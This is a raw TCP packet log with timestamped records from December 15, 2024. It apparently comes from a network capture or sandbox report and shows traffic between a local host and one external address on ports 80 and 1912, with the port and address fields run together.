                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.265831947 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.266041994 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.266093969 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.267116070 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.267152071 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.267201900 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.268189907 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.268244028 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.268419027 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.269292116 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.270076990 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.270137072 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.270509958 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.270572901 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.270677090 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.271670103 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.271846056 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.272084951 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.273000002 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.273034096 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.273092985 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.274029016 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.274064064 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.274260998 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.275088072 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.275270939 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.275687933 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.276288986 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.276343107 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.276403904 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.277376890 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.277611017 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.277978897 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.278577089 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.278732061 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.278780937 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.279788971 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.279840946 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.280405998 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.280985117 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.281018972 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.281107903 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.282061100 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.282243967 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.282298088 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.283293962 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.283363104 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.283457994 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.284413099 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.333123922 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.340003967 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.340086937 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.340145111 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.340257883 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.340270042 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.340325117 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.341379881 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.341465950 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.341536045 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.342581034 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.342605114 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.342653036 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.343671083 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.343740940 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.343830109 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.344846964 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.344885111 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.344929934 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.345823050 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.346071959 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.346132040 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.347138882 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.347174883 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.347229004 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.348109961 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.348145008 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.348202944 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.349317074 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.395509958 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.395566940 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.395652056 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.432940960 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.442528963 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.532207012 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.532315016 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.532412052 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.532576084 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.532787085 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.533191919 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.533241987 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.533318996 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.533365011 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.533725023 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.533916950 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.534399986 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.534451008 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.534545898 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.535180092 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.535228968 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.535270929 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.535317898 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.535797119 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.535943031 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.536442041 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.536499023 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.536623001 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.536670923 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.537167072 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.537332058 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.537761927 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.537807941 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.537913084 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.537960052 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.538443089 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.538604021 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.539134979 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.539182901 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.539247036 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.539294958 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.539942026 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.539977074 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.540524006 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.540580034 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.540633917 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.540679932 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.541207075 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.541322947 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.541810989 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.541858912 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.542028904 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.542073965 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.542612076 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.542689085 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.542737961 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.543153048 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.543292999 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.543858051 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.543917894 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.543977022 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.544029951 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.544584990 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.544728994 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.545238018 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.545285940 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.545341969 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.545388937 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.545872927 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.546005011 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.546506882 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.546555996 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.546683073 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.547362089 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.547394991 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.547421932 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.547435999 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.547926903 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.548069954 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.548459053 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.548789024 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.548824072 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.548882961 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.549247026 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.549422979 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.549998045 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.550048113 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.550149918 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.550194979 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.550713062 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.550859928 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.550908089 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.551393986 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.551428080 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.551942110 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.551994085 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.552048922 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.552093983 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.404512882 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.409039021 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.409063101 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.409126043 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.413856983 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.414180040 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.414282084 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.418764114 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.418945074 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.419007063 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.423744917 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.423780918 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.423839092 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.428388119 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.428577900 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.428884029 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.432511091 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.432544947 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.432652950 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.439877033 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.439913988 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.440001965 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.443259001 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.443294048 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.443387032 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.447047949 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.447103977 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.447185040 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.451864958 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.451951981 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.452028990 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.456722021 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.456821918 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.456885099 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.558773041 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.559793949 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.559895039 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.560081005 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.562170029 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.562231064 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.562299967 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.563932896 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.566915035 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.566994905 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.567143917 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.571638107 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.571695089 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.571804047 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.577126026 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.577270985 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.577328920 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.581552982 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.581708908 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.581927061 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.585644960 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.585968971 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.586030960 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.589838028 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.590024948 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.590172052 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.593760967 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.593904972 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.593952894 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.597507954 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.597695112 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.597747087 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.601569891 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.601736069 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.601789951 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.605487108 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.605678082 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.605736017 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.609321117 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.609510899 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.609564066 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.612396002 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.612508059 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.612561941 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.617362976 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.617546082 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.617603064 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.621205091 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.621380091 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.621453047 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.625148058 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.625346899 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.625458956 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.629070044 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.629276991 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.629349947 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.632110119 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.632145882 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.632208109 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.636202097 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.636285067 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.636455059 CET4972080192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.639942884 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.639995098 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.848028898 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.848092079 CET8049720185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:22.848145008 CET4972080192.168.2.5185.81.68.147
